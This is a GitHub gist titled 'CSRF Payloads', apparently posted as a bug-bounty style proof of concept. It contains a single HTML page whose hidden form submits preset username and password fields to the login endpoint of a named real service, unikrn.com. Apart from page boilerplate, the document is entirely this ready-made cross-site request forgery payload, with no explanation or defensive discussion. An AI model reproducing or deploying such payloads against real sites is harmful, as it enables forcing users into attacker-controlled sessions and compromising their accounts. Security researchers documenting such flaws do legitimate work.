Skip to content

Instantly share code, notes, and snippets.

@hackerhumble
Created September 7, 2019 17:43
Show Gist options
  • Save hackerhumble/04c3e3fc0a3621a68329a6c0c50f51ba to your computer and use it in GitHub Desktop.
Save hackerhumble/04c3e3fc0a3621a68329a6c0c50f51ba to your computer and use it in GitHub Desktop.
CSRF Payloads
**Sample CSRF Payload**
<html>
<body>
<form action="https://unikrn.com/apiv1/login" method="POST">
<input type="hidden" name="usr" value="[email]">
<input type="hidden" name="pwd" value="[password]">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-----------------------------------------------------------
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment